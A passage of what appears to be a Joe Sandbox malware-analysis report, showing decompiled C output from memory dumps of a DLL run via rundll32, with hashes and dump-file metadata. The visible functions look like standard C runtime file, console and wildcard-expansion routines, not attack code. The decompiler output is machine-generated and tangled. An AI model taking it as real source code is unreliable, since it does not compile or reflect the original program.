								__eflags = _t240;
								if(__eflags != 0) {
									_t158 = E1003948F(_t198, 0, 0, 1);
									_t242 = _t243 + 0x10;
									_t214 =  *((intOrPtr*)(0x1004e628 + _v12 * 4));
									 *((intOrPtr*)(_t235 + _t214 + 0x20)) = _t158;
									 *(_t235 + _t214 + 0x24) = _t228;
									_t229 = _t240;
									_t210 = _v16;
									_t143 =  *((intOrPtr*)(0x1004e628 + _v12 * 4));
									L22:
									_t199 = _v20;
									_t235 = 0;
									_v40 = _t229;
									__eflags =  *(_t199 + _t143 + 0x28) & 0x00000048;
									_t200 = _a4;
									if(( *(_t199 + _t143 + 0x28) & 0x00000048) != 0) {
										_t180 =  *((intOrPtr*)(_v20 + _t143 + 0x2a));
										_t200 = _a4;
										__eflags = _t180 - 0xa;
										if(_t180 != 0xa) {
											__eflags = _t210;
											if(_t210 != 0) {
												_t235 = 1;
												 *_t229 = _t180;
												_t231 = _t229 + 1;
												_t220 = _t210 - 1;
												__eflags = _v5;
												_v24 = _t231;
												_v16 = _t220;
												 *((char*)(_v20 +  *((intOrPtr*)(0x1004e628 + _v12 * 4)) + 0x2a)) = 0xa;
												_t200 = _a4;
												if(_v5 != 0) {
													_t185 =  *((intOrPtr*)(_v20 +  *((intOrPtr*)(0x1004e628 + _v12 * 4)) + 0x2b));
													_t200 = _a4;
													__eflags = _t185 - 0xa;
													if(_t185 != 0xa) {
														__eflags = _t220;
														if(_t220 != 0) {
															 *_t231 = _t185;
															_t232 = _t231 + 1;
															_t221 = _t220 - 1;
															__eflags = _v5 - 1;
															_v24 = _t232;
															_t235 = 2;
															_v16 = _t221;
															 *((char*)(_v20 +  *((intOrPtr*)(0x1004e628 + _v12 * 4)) + 0x2b)) = 0xa;
															_t200 = _a4;
															if(_v5 == 1) {
																_t190 =  *((intOrPtr*)(_v20 +  *((intOrPtr*)(0x1004e628 + _v12 * 4)) + 0x2c));
																_t200 = _a4;
																__eflags = _t190 - 0xa;
																if(_t190 != 0xa) {
																	__eflags = _t221;
																	if(_t221 != 0) {
																		 *_t232 = _t190;
																		_t222 = _t221 - 1;
																		__eflags = _t222;
																		_v16 = _t222;
																		_v24 = _t232 + 1;
																		_t235 = 3;
																		 *((char*)(_v20 +  *((intOrPtr*)(0x1004e628 + _v12 * 4)) + 0x2c)) = 0xa;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									_t160 = E100331B8(_t200);
									__eflags = _t160;
									if(_t160 == 0) {
										L42:
										_v36 = 0;
										L43:
										_t163 = ReadFile(_v28, _v24, _v16,  &_v32, 0);
										__eflags = _t163;
										if(_t163 == 0) {
											L54:
											_t164 = GetLastError();
											_t235 = 5;
											__eflags = _t164 - _t235;
											if(__eflags != 0) {
												__eflags = _t164 - 0x6d;
												if(_t164 != 0x6d) {
													L38:
													E10024468(_t164);
													goto L39;
												}
												_t236 = 0;
												goto L40;
											}
											 *((intOrPtr*)(E1002449E(__eflags))) = 9;
											 *(E1002448B(__eflags)) = _t235;
											goto L39;
										}
										_t217 = _a12;
										__eflags = _v32 - _t217;
										if(_v32 > _t217) {
											goto L54;
										}
										_t236 = _t235 + _v32;
										__eflags = _t236;
										L46:
										_t230 = _v20;
										_t169 =  *((intOrPtr*)(0x1004e628 + _v12 * 4));
										__eflags =  *((char*)(_t230 + _t169 + 0x28));
										if( *((char*)(_t230 + _t169 + 0x28)) < 0) {
											__eflags = _v5 - 2;
											if(_v5 == 2) {
												__eflags = _v36;
												_push(_t236 >> 1);
												_push(_v40);
												_push(_t200);
												if(_v36 == 0) {
													_t170 = E1003973E();
												} else {
													_t170 = E10039AA6();
												}
											} else {
												_t218 = _t217 >> 1;
												__eflags = _t217 >> 1;
												_t170 = E1003994F(_t217 >> 1, _t217 >> 1, _t200, _v24, _t236, _a8, _t218);
											}
											_t236 = _t170;
										}
										goto L40;
									}
									_t219 = _v20;
									_t172 =  *((intOrPtr*)(0x1004e628 + _v12 * 4));
									__eflags =  *((char*)(_t219 + _t172 + 0x28));
									if( *((char*)(_t219 + _t172 + 0x28)) >= 0) {
										goto L42;
									}
									_t174 = GetConsoleMode(_v28,  &_v44);
									__eflags = _t174;
									if(_t174 == 0) {
										goto L42;
									}
									__eflags = _v5 - 2;
									if(_v5 != 2) {
										goto L43;
									}
									_t178 = ReadConsoleW(_v28, _v24, _v16 >> 1,  &_v32, 0);
									__eflags = _t178;
									if(_t178 != 0) {
										_t217 = _a12;
										_t236 = _t235 + _v32 * 2;
										goto L46;
									}
									_t164 = GetLastError();
									goto L38;
								} else {
									 *((intOrPtr*)(E1002449E(__eflags))) = 0xc;
									 *(E1002448B(__eflags)) = 8;
									L39:
									_t236 = _t235 | 0xffffffff;
									__eflags = _t236;
									L40:
									E100268B3(_t240);
									return _t236;
								}
							}
						}
						__eflags = _t228 == 1;
						if(_t228 == 1) {
							__eflags =  !_t210 & 0x00000001;
							if(__eflags != 0) {
								_t229 = _a8;
								_v16 = _t210;
								_v24 = _t229;
								_t143 =  *((intOrPtr*)(0x1004e628 + _v12 * 4));
								goto L22;
							}
							goto L14;
						} else {
							_t229 = _a8;
							_v16 = _t210;
							_v24 = _t229;
							goto L22;
						}
					}
					L6:
					 *(E1002448B(__eflags)) =  *_t145 & 0x00000000;
					 *((intOrPtr*)(E1002449E(__eflags))) = 0x16;
					goto L60;
				} else {
					 *(E1002448B(_t246)) =  *_t197 & 0x00000000;
					_t139 = E1002449E(_t246);
					 *_t139 = 9;
					L61:
					return _t139 | 0xffffffff;
				}
			}

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14334cd124f7857333d6a87dc4dbb4beeafbf5ac604f7dd62759596a9d004c8b
Instruction ID: 06d7e98826e9061cf5f9f575d1909f9ed043f22c31c120a23b2795546a4967bb
Opcode Fuzzy Hash: 14334cd124f7857333d6a87dc4dbb4beeafbf5ac604f7dd62759596a9d004c8b
Instruction Fuzzy Hash: E1C1D074A04259AFEB02DF98C981BADBBF4EF4A351F114159E905EF392C734AD42CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1002F19F, Relevance: 13.7, APIs: 9, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E1002F19F(void* __edx, char _a4) {
				void* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t57;
				signed int _t60;
				signed int _t69;
				signed int _t71;
				signed int _t74;
				signed int _t77;
				char _t82;
				void* _t93;
				signed int _t96;
				char _t107;
				char _t108;
				void* _t113;
				char* _t114;
				signed int _t120;
				signed int* _t121;
				char _t123;
				intOrPtr* _t125;
				char* _t130;

				_t113 = __edx;
				_t123 = _a4;
				_v24 = _t123;
				_v20 = 0;
				if( *((intOrPtr*)(_t123 + 0xb0)) != 0 ||  *((intOrPtr*)(_t123 + 0xac)) != 0) {
					_v16 = 1;
					_t93 = E10026850(1, 0x50);
					if(_t93 != 0) {
						_t96 = 0x14;
						memcpy(_t93,  *(_t123 + 0x88), _t96 << 2);
						_t125 = E10024214(4);
						_t120 = 0;
						_v8 = _t125;
						E100268B3(0);
						if(_t125 != 0) {
							 *_t125 = 0;
							_t123 = _a4;
							if( *((intOrPtr*)(_t123 + 0xb0)) == 0) {
								_t53 =  *0x1004d788; // 0x1004d7dc
								 *_t93 = _t53;
								_t54 =  *0x1004d78c; // 0x1004e868
								 *((intOrPtr*)(_t93 + 4)) = _t54;
								_t55 =  *0x1004d790; // 0x1004e868
								 *((intOrPtr*)(_t93 + 8)) = _t55;
								_t56 =  *0x1004d7b8; // 0x1004d7e0
								 *((intOrPtr*)(_t93 + 0x30)) = _t56;
								_t57 =  *0x1004d7bc; // 0x1004e86c
								 *((intOrPtr*)(_t93 + 0x34)) = _t57;
								L19:
								 *_v8 = 1;
								if(_t120 != 0) {
									 *_t120 = 1;
								}
								goto L21;
							}
							_t121 = E10024214(4);
							_v12 = _t121;
							E100268B3(0);
							_push(_t93);
							if(_t121 != 0) {
								 *_t121 =  *_t121 & 0x00000000;
								_t122 =  *((intOrPtr*)(_t123 + 0xb0));
								_push(0xe);
								_push( *((intOrPtr*)(_t123 + 0xb0)));
								_push(1);
								_push( &_v24);
								_t69 = E10037D5C(_t113);
								_t16 = _t93 + 4; // 0x4
								_t71 = E10037D5C(_t113,  &_v24, 1,  *((intOrPtr*)(_t123 + 0xb0)), 0xf, _t16);
								_t18 = _t93 + 8; // 0x8
								_t74 = E10037D5C(_t113,  &_v24, 1,  *((intOrPtr*)(_t123 + 0xb0)), 0x10, _t18);
								_t77 = E10037D5C(_t113,  &_v24, 2, _t122, 0xe, _t93 + 0x30);
								_t22 = _t93 + 0x34; // 0x34
								if((E10037D5C(_t113,  &_v24, 2, _t122, 0xf, _t22) | _t69 | _t71 | _t74 | _t77) == 0) {
									_t114 =  *((intOrPtr*)(_t93 + 8));
									while(1) {
										_t82 =  *_t114;
										if(_t82 == 0) {
											break;
										}
										_t30 = _t82 - 0x30; // -48
										_t107 = _t30;
										if(_t107 > 9) {
											if(_t82 != 0x3b) {
												L16:
												_t114 = _t114 + 1;
												continue;
											}
											_t130 = _t114;
											do {
												_t108 =  *((intOrPtr*)(_t130 + 1));
												 *_t130 = _t108;
												_t130 = _t130 + 1;
											} while (_t108 != 0);
											continue;
										}
										 *_t114 = _t107;
										goto L16;
									}
									_t120 = _v12;
									_t123 = _a4;
									goto L19;
								}
								E1002F136(_t93);
								E100268B3(_t93);
								E100268B3(_v12);
								_v16 = _v16 | 0xffffffff;
								L12:
								E100268B3(_v8);
								return _v16;
							}
							E100268B3();
							goto L12;
						}
						E100268B3(_t93);
						return 1;
					}
					return 1;
				} else {
					_t120 = 0;
					_v8 = 0;
					_t93 = 0x1004d788;
					L21:
					_t60 =  *(_t123 + 0x80);
					if(_t60 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t123 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t60 | 0xffffffff) == 0) {
							E100268B3( *((intOrPtr*)(_t123 + 0x7c)));
							E100268B3( *(_t123 + 0x88));
						}
					}
					 *((intOrPtr*)(_t123 + 0x7c)) = _v8;
					 *(_t123 + 0x80) = _t120;
					 *(_t123 + 0x88) = _t93;
					return 0;
				}
			}

APIs

_free.LIBCMT ref: 1002F20D
_free.LIBCMT ref: 1002F219
_free.LIBCMT ref: 1002F342
_free.LIBCMT ref: 1002F34D

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: e72b2000ea6275254dec66e37fb39df4ccb8ac4d77d9a4d80c0119116b12df20
Instruction ID: d13b4a520b74060ec193128ac1be29b222bffbea19a5bef822ff00477154d023
Opcode Fuzzy Hash: e72b2000ea6275254dec66e37fb39df4ccb8ac4d77d9a4d80c0119116b12df20
Instruction Fuzzy Hash: 9F61E5759003059FE720DF64EC41BAAB7F8EF49790FA1416EE959EB241EB70AD04CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10026AD8, Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 431
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E10026AD8(void* __esi, signed int _a4, signed int* _a8) {
				signed int _v0;
				intOrPtr _v4;
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				short _v18;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int* _v40;
				signed int _v44;
				signed int _v48;
				intOrPtr _v56;
				signed int _v60;
				signed int _v68;
				signed int* _v72;
				signed int _v84;
				signed int* _v100;
				signed int _v112;
				intOrPtr* _v160;
				intOrPtr* _v200;
				intOrPtr* _v232;
				intOrPtr* _v236;
				intOrPtr _v240;
				signed int _v252;
				struct _WIN32_FIND_DATAW _v616;
				char _v617;
				intOrPtr* _v624;
				union _FINDEX_INFO_LEVELS _v628;
				union _FINDEX_INFO_LEVELS _v632;
				union _FINDEX_INFO_LEVELS _v636;
				signed int _v640;
				union _FINDEX_INFO_LEVELS _v644;
				union _FINDEX_INFO_LEVELS _v648;
				signed int _v652;
				signed int _v656;
				union _FINDEX_INFO_LEVELS _v660;
				union _FINDEX_INFO_LEVELS _v664;
				union _FINDEX_INFO_LEVELS _v668;
				union _FINDEX_INFO_LEVELS _v672;
				signed int _v676;
				union _FINDEX_INFO_LEVELS _v680;
				union _FINDEX_INFO_LEVELS _v684;
				intOrPtr _v852;
				void* __ebp;
				intOrPtr* _t216;
				signed int _t217;
				signed int _t219;
				signed int _t224;
				signed int _t225;
				signed int _t235;
				signed int _t237;
				signed int _t238;
				signed int _t242;
				signed int _t244;
				signed int _t246;
				signed int _t247;
				signed int _t249;
				signed int _t254;
				signed int _t255;
				intOrPtr* _t266;
				intOrPtr _t268;
				signed int _t269;
				signed int _t272;
				signed int _t274;
				signed int _t279;
				signed int _t281;
				signed int _t286;
				signed int _t289;
				char _t291;
				signed char _t292;
				signed int _t298;
				union _FINDEX_INFO_LEVELS _t302;
				signed int _t308;
				union _FINDEX_INFO_LEVELS _t311;
				intOrPtr* _t319;
				signed int _t322;
				intOrPtr _t327;
				signed int _t332;
				signed int _t334;
				signed int _t335;
				signed int _t338;
				signed int _t340;
				signed int _t341;
				signed int _t342;
				intOrPtr _t344;
				signed int _t349;
				signed int _t350;
				signed int _t351;
				signed int* _t352;
				signed int _t354;
				signed int _t355;
				signed int _t357;
				signed int _t359;
				signed int _t360;
				signed int* _t361;
				signed int _t364;
				signed int _t366;
				void* _t369;
				void* _t372;
				union _FINDEX_INFO_LEVELS _t373;
				signed int _t376;
				signed int* _t378;
				signed int* _t381;
				signed int _t383;
				signed int _t385;
				signed int _t388;
				signed int _t389;
				signed int _t391;
				signed int _t397;
				intOrPtr* _t398;
				signed int _t403;
				intOrPtr* _t404;
				signed int _t406;
				void* _t408;
				intOrPtr* _t409;
				signed int _t412;
				intOrPtr* _t415;
				signed int _t420;
				signed int _t426;
				signed int _t428;
				intOrPtr* _t439;
				signed int _t442;
				short _t443;
				signed int _t448;
				intOrPtr* _t449;
				signed int _t457;
				signed int _t459;
				intOrPtr* _t460;
				signed int _t465;
				void* _t466;
				void* _t467;
				signed int _t469;
				signed int _t470;
				signed int _t473;
				signed int _t476;
				signed int _t478;
				signed int _t480;
				signed int _t482;
				intOrPtr _t483;
				signed int _t485;
				signed int* _t490;
				signed int _t491;
				signed int _t493;
				signed int _t494;
				signed int _t495;
				signed int _t497;
				signed int* _t498;
				signed int _t499;
				signed int _t501;
				signed int _t502;
				signed int _t505;
				void* _t506;
				intOrPtr _t507;
				void* _t508;
				signed int _t511;
				signed int _t516;
				void* _t517;
				void* _t518;
				signed int _t519;
				void* _t520;
				void* _t521;
				signed int _t522;
				void* _t523;
				void* _t524;
				void* _t525;
				signed int _t526;
				void* _t527;
				void* _t528;

				_t216 = _a8;
				_t521 = _t520 - 0x28;
				_t532 = _t216;
				if(_t216 != 0) {
					_t490 = _a4;
					_t364 = 0;
					 *_t216 = 0;
					_t476 = 0;
					_t217 =  *_t490;
					_t381 = 0;
					_v44 = 0;
					_v40 = 0;
					_v36 = 0;
					__eflags = _t217;
					if(_t217 == 0) {
						L9:
						_v8 = _t364;
						_t219 = _t381 - _t476;
						_t491 = _t476;
						_v12 = _t491;
						_t456 = (_t219 >> 2) + 1;
						_t221 = _t219 + 3 >> 2;
						__eflags = _t381 - _t491;
						_v16 = (_t219 >> 2) + 1;
						asm("sbb esi, esi");
						_t493 =  !_t491 & _t219 + 0x00000003 >> 0x00000002;
						__eflags = _t493;
						if(_t493 != 0) {
							_t355 = _t476;
							_t473 = _t364;
							do {
								_t449 =  *_t355;
								_t20 = _t449 + 1; // 0x1
								_v20 = _t20;
								do {
									_t357 =  *_t449;
									_t449 = _t449 + 1;
									__eflags = _t357;
								} while (_t357 != 0);
								_t364 = _t364 + 1 + _t449 - _v20;
								_t355 = _v12 + 4;
								_t473 = _t473 + 1;
								_v12 = _t355;
								__eflags = _t473 - _t493;
							} while (_t473 != _t493);
							_t456 = _v16;
							_v8 = _t364;
							_t364 = 0;
							__eflags = 0;
						}
						_t494 = E10010F75(_t221, _t456, _v8, 1);
						_t522 = _t521 + 0xc;
						__eflags = _t494;
						if(_t494 != 0) {
							_v12 = _t476;
							_t224 = _t494 + _v16 * 4;
							_t382 = _t224;
							_v28 = _t224;
							_t225 = _t476;
							_v16 = _t224;
							__eflags = _t225 - _v40;
							if(_t225 == _v40) {
								L24:
								_v12 = _t364;
								 *_a8 = _t494;
								_t495 = _t364;
								goto L25;
							} else {
								_t459 = _t494 - _t476;
								__eflags = _t459;
								_v32 = _t459;
								do {
									_t235 =  *_t225;
									_t460 = _t235;
									_v24 = _t235;
									_v20 = _t460 + 1;
									do {
										_t237 =  *_t460;
										_t460 = _t460 + 1;
										__eflags = _t237;
									} while (_t237 != 0);
									_t461 = _t460 - _v20;
									_t238 = _t460 - _v20 + 1;
									_push(_t238);
									_v20 = _t238;
									_t242 = E100315C1(_t382, _v28 - _t382 + _v8, _v24);
									_t522 = _t522 + 0x10;
									__eflags = _t242;
									if(_t242 != 0) {
										_push(_t364);
										_push(_t364);
										_push(_t364);
										_push(_t364);
										_push(_t364);
										E1000E341();
										asm("int3");
										_t516 = _t522;
										_t523 = _t522 - 0x34;
										_t244 =  *0x1004d054; // 0xda1f8931
										_v84 = _t244 ^ _t516;
										_t246 = _v68;
										_v112 = _t246;
										_push(_t494);
										_t498 = _v72;
										_v100 = _t498;
										__eflags = _t246;
										if(__eflags != 0) {
											_push(_t364);
											_push(_t476);
											_t478 = 0;
											 *_t246 = 0;
											_t366 = 0;
											_t247 =  *_t498;
											_t388 = 0;
											_v616.cAlternateFileName = 0;
											_v48 = 0;
											_v44 = 0;
											__eflags = _t247;
											if(_t247 == 0) {
												L42:
												_v24 = _t478;
												_t249 = _t388 - _t366;
												_t499 = _t366;
												_v28 = _t499;
												_t464 = (_t249 >> 2) + 1;
												_t251 = _t249 + 3 >> 2;
												__eflags = _t388 - _t499;
												_v36 = (_t249 >> 2) + 1;
												asm("sbb esi, esi");
												_t501 =  !_t499 & _t249 + 0x00000003 >> 0x00000002;
												__eflags = _t501;
												if(_t501 != 0) {
													_t342 = _t366;
													_t470 = _t478;
													do {
														_t439 =  *_t342;
														_t87 = _t439 + 2; // 0x2
														_v32 = _t87;
														do {
															_t344 =  *_t439;
															_t439 = _t439 + 2;
															__eflags = _t344 - _t478;
														} while (_t344 != _t478);
														_v24 = _v24 + 1 + (_t439 - _v32 >> 1);
														_t342 = _v28 + 4;
														_t470 = _t470 + 1;
														_v28 = _t342;
														__eflags = _t470 - _t501;
													} while (_t470 != _t501);
													_t464 = _v36;
												}
												_t502 = E10010F75(_t251, _t464, _v24, 2);
												_t524 = _t523 + 0xc;
												__eflags = _t502;
												if(_t502 != 0) {
													_v28 = _t366;
													_t254 = _t502 + _v36 * 4;
													_t465 = _t254;
													_v60 = _t254;
													_t255 = _t366;
													_v36 = _t465;
													__eflags = _t255 - _v48;
													if(_t255 == _v48) {
														L57:
														_v24 = _t478;
														 *_v40 = _t502;
														_t503 = _t478;
														goto L58;
													} else {
														_t397 = _t502 - _t366;
														__eflags = _t397;
														_v20 = _t397;
														do {
															_t266 =  *_t255;
															_t398 = _t266;
															_v56 = _t266;
															_v32 = _t398 + 2;
															do {
																_t268 =  *_t398;
																_t398 = _t398 + 2;
																__eflags = _t268 - _t478;
															} while (_t268 != _t478);
															_t269 = (_t398 - _v32 >> 1) + 1;
															_push(_t269);
															_v32 = _t269;
															_t403 = _t465 - _v60 >> 1;
															_t272 = E1002FBCB(_t465, _v24 - _t403, _v56);
															_t524 = _t524 + 0x10;
															__eflags = _t272;
															if(_t272 != 0) {
																_push(_t478);
																_push(_t478);
																_push(_t478);
																_push(_t478);
																_push(_t478);
																E1000E341();
																asm("int3");
																_push(_t516);
																_t517 = _t524;
																_push(_t403);
																_t404 = _v160;
																_t136 = _t404 + 1; // 0x1
																_t466 = _t136;
																do {
																	_t274 =  *_t404;
																	_t404 = _t404 + 1;
																	__eflags = _t274;
																} while (_t274 != 0);
																_push(_t478);
																_t480 = _a4;
																_t406 = _t404 - _t466 + 1;
																_v16 = _t406;
																__eflags = _t406 -  !_t480;
																if(_t406 <=  !_t480) {
																	_push(_t366);
																	_t139 = _t480 + 1; // 0x1
																	_t369 = _t139 + _t406;
																	_t506 = E10026850(_t369, 1);
																	_t408 = _t502;
																	__eflags = _t480;
																	if(_t480 == 0) {
																		L73:
																		_push(_v16);
																		_t369 = _t369 - _t480;
																		_t279 = E100315C1(_t506 + _t480, _t369, _v4);
																		_t525 = _t524 + 0x10;
																		__eflags = _t279;
																		if(_t279 != 0) {
																			goto L78;
																		} else {
																			_t378 = _a8;
																			_t335 = E100278B8(_t378);
																			_v16 = _t335;
																			__eflags = _t335;
																			if(_t335 == 0) {
																				 *(_t378[1]) = _t506;
																				_t511 = 0;
																				_t148 =  &(_t378[1]);
																				 *_t148 = _t378[1] + 4;
																				__eflags =  *_t148;
																			} else {
																				E100268B3(_t506);
																				_t511 = _v16;
																			}
																			E100268B3(0);
																			_t338 = _t511;
																			goto L70;
																		}
																	} else {
																		_push(_t480);
																		_t340 = E100315C1(_t506, _t369, _v0);
																		_t525 = _t524 + 0x10;
																		__eflags = _t340;
																		if(_t340 != 0) {
																			L78:
																			_push(0);
																			_push(0);
																			_push(0);
																			_push(0);
																			_push(0);
																			E1000E341();
																			asm("int3");
																			_push(_t517);
																			_t518 = _t525;
																			_push(_t408);
																			_t409 = _v200;
																			_push(_t369);
																			_push(0);
																			__eflags = 0;
																			_t151 = _t409 + 2; // 0x2
																			_t467 = _t151;
																			do {
																				_t281 =  *_t409;
																				_t409 = _t409 + 2;
																				__eflags = _t281;
																			} while (_t281 != 0);
																			_t482 = _v0;
																			_t412 = (_t409 - _t467 >> 1) + 1;
																			_v20 = _t412;
																			__eflags = _t412 -  !_t482;
																			if(_t412 <=  !_t482) {
																				_push(_t506);
																				_t154 = _t482 + 1; // 0x1
																				_t372 = _t154 + _t412;
																				_t507 = E10026850(_t372, 2);
																				__eflags = _t482;
																				if(_t482 == 0) {
																					L86:
																					_push(_v20);
																					_t372 = _t372 - _t482;
																					_t286 = E1002FBCB(_t507 + _t482 * 2, _t372, _v8);
																					_t526 = _t525 + 0x10;
																					__eflags = _t286;
																					if(_t286 != 0) {
																						goto L91;
																					} else {
																						_t485 = _a4;
																						_t376 = E1002793F(_t485);
																						__eflags = _t376;
																						if(_t376 == 0) {
																							 *((intOrPtr*)( *((intOrPtr*)(_t485 + 4)))) = _t507;
																							 *((intOrPtr*)(_t485 + 4)) =  *((intOrPtr*)(_t485 + 4)) + 4;
																							_t376 = 0;
																							__eflags = 0;
																						} else {
																							E100268B3(_t507);
																						}
																						E100268B3(0);
																						_t332 = _t376;
																						goto L83;
																					}
																				} else {
																					_push(_t482);
																					_t334 = E1002FBCB(_t507, _t372, _v4);
																					_t526 = _t525 + 0x10;
																					__eflags = _t334;
																					if(_t334 != 0) {
																						L91:
																						_push(0);
																						_push(0);
																						_push(0);
																						_push(0);
																						_push(0);
																						E1000E341();
																						asm("int3");
																						_push(_t518);
																						_t519 = _t526;
																						_t527 = _t526 - 0x298;
																						_t289 =  *0x1004d054; // 0xda1f8931
																						_v252 = _t289 ^ _t519;
																						_t415 = _v236;
																						_t468 = _v232;
																						_push(_t372);
																						_push(_t482);
																						_t483 = _v240;
																						_v852 = _t468;
																						__eflags = _t415 - _t483;
																						if(_t415 != _t483) {
																							while(1) {
																								_t327 =  *_t415;
																								__eflags = _t327 - 0x2f;
																								if(_t327 == 0x2f) {
																									break;
																								}
																								__eflags = _t327 - 0x5c;
																								if(_t327 != 0x5c) {
																									__eflags = _t327 - 0x3a;
																									if(_t327 != 0x3a) {
																										_t415 = E10031610(_t483, _t415);
																										__eflags = _t415 - _t483;
																										if(_t415 != _t483) {
																											continue;
																										}
																									}
																								}
																								break;
																							}
																							_t468 = _v624;
																						}
																						_t291 =  *_t415;
																						_v617 = _t291;
																						__eflags = _t291 - 0x3a;
																						if(_t291 != 0x3a) {
																							L102:
																							_t373 = 0;
																							__eflags = _t291 - 0x2f;
																							if(__eflags == 0) {
																								L105:
																								_t292 = 1;
																							} else {
																								__eflags = _t291 - 0x5c;
																								if(__eflags == 0) {
																									goto L105;
																								} else {
																									__eflags = _t291 - 0x3a;
																									_t292 = 0;
																									if(__eflags == 0) {
																										goto L105;
																									}
																								}
																							}
																							_v684 = _t373;
																							_v680 = _t373;
																							_push(_t507);
																							asm("sbb eax, eax");
																							_v676 = _t373;
																							_v672 = _t373;
																							_v652 =  ~(_t292 & 0x000000ff) & _t415 - _t483 + 0x00000001;
																							_v668 = _t373;
																							_v664 = _t373;
																							_t298 = E10026A9E(_t415 - _t483 + 1, _t483,  &_v684, E100276E1(_t468, __eflags));
																							_t528 = _t527 + 0xc;
																							asm("sbb eax, eax");
																							_t302 = FindFirstFileExW( !( ~_t298) & _v676, _t373,  &_v616, _t373, _t373, _t373);
																							_t508 = _t302;
																							__eflags = _t508 - 0xffffffff;
																							if(_t508 != 0xffffffff) {
																								_t420 =  *((intOrPtr*)(_v624 + 4)) -  *_v624;
																								__eflags = _t420;
																								_v656 = _t420 >> 2;
																								do {
																									_v648 = _t373;
																									_v644 = _t373;
																									_v640 = _t373;
																									_v636 = _t373;
																									_v632 = _t373;
																									_v628 = _t373;
																									_t308 = E100269CF( &(_v616.cFileName),  &_v648,  &_v617, E100276E1(_t468, __eflags));
																									_t528 = _t528 + 0x10;
																									asm("sbb eax, eax");
																									_t311 =  !( ~_t308) & _v640;
																									__eflags =  *_t311 - 0x2e;
																									if( *_t311 != 0x2e) {
																										L113:
																										_push(_v624);
																										_push(_v652);
																										_push(_t483);
																										_push(_t311);
																										L66();
																										_t528 = _t528 + 0x10;
																										_v660 = _t311;
																										__eflags = _t311;
																										if(_t311 != 0) {
																											__eflags = _v628 - _t373;
																											if(_v628 != _t373) {
																												E100268B3(_v640);
																												_t311 = _v660;
																											}
																											_t373 = _t311;
																										} else {
																											goto L114;
																										}
																									} else {
																										_t426 =  *((intOrPtr*)(_t311 + 1));
																										__eflags = _t426;
																										if(_t426 == 0) {
																											L114:
																											__eflags = _v628 - _t373;
																											if(_v628 != _t373) {
																												E100268B3(_v640);
																											}
																											goto L116;
																										} else {
																											__eflags = _t426 - 0x2e;
																											if(_t426 != 0x2e) {
																												goto L113;
																											} else {
																												__eflags =  *((intOrPtr*)(_t311 + 2)) - _t373;
																												if( *((intOrPtr*)(_t311 + 2)) == _t373) {
																													goto L114;
																												} else {
																													goto L113;
																												}
																											}
																										}
																									}
																									L122:
																									FindClose(_t508);
																									goto L123;
																									L116:
																									__eflags = FindNextFileW(_t508,  &_v616);
																								} while (__eflags != 0);
																								_t319 = _v624;
																								_t428 = _v656;
																								_t468 =  *_t319;
																								_t322 =  *((intOrPtr*)(_t319 + 4)) -  *_t319 >> 2;
																								__eflags = _t428 - _t322;
																								if(_t428 != _t322) {
																									E10031020(_t468, _t468 + _t428 * 4, _t322 - _t428, 4, E100268ED);
																								}
																								goto L122;
																							} else {
																								_push(_v624);
																								_push(_t373);
																								_push(_t373);
																								_push(_t483);
																								L66();
																								_t373 = _t302;
																							}
																							L123:
																							__eflags = _v664;
																							if(_v664 != 0) {
																								E100268B3(_v676);
																							}
																							_t313 = _t373;
																						} else {
																							_t313 = _t483 + 1;
																							__eflags = _t415 - _t483 + 1;
																							if(_t415 == _t483 + 1) {
																								_t291 = _v617;
																								goto L102;
																							} else {
																								_push(_t468);
																								_push(0);
																								_push(0);
																								_push(_t483);
																								L66();
																							}
																						}
																						__eflags = _v24 ^ _t519;
																						return E100037EA(_t313, _v24 ^ _t519, _t468);
																					} else {
																						goto L86;
																					}
																				}
																			} else {
																				_t332 = 0xc;
																				L83:
																				return _t332;
																			}
																		} else {
																			goto L73;
																		}
																	}
																} else {
																	_t338 = 0xc;
																	L70:
																	return _t338;
																}
															} else {
																goto L56;
															}
															goto L127;
															L56:
															_t341 = _v28;
															_t469 = _v36;
															 *((intOrPtr*)(_v20 + _t341)) = _t469;
															_t255 = _t341 + 4;
															_v28 = _t255;
															_t465 = _t469 + _v32 * 2;
															_v36 = _t465;
															__eflags = _t255 - _v48;
														} while (_t255 != _v48);
														goto L57;
													}
												} else {
													_t503 = _t502 | 0xffffffff;
													_v24 = _t502 | 0xffffffff;
													L58:
													E100268B3(_t478);
													_pop(_t389);
													goto L59;
												}
											} else {
												while(1) {
													_t442 = 0x2a;
													_v20 = _t442;
													_t443 = 0x3f;
													_v18 = _t443;
													_v16 = 0;
													_t349 = E1002FC2F(_t247,  &_v20);
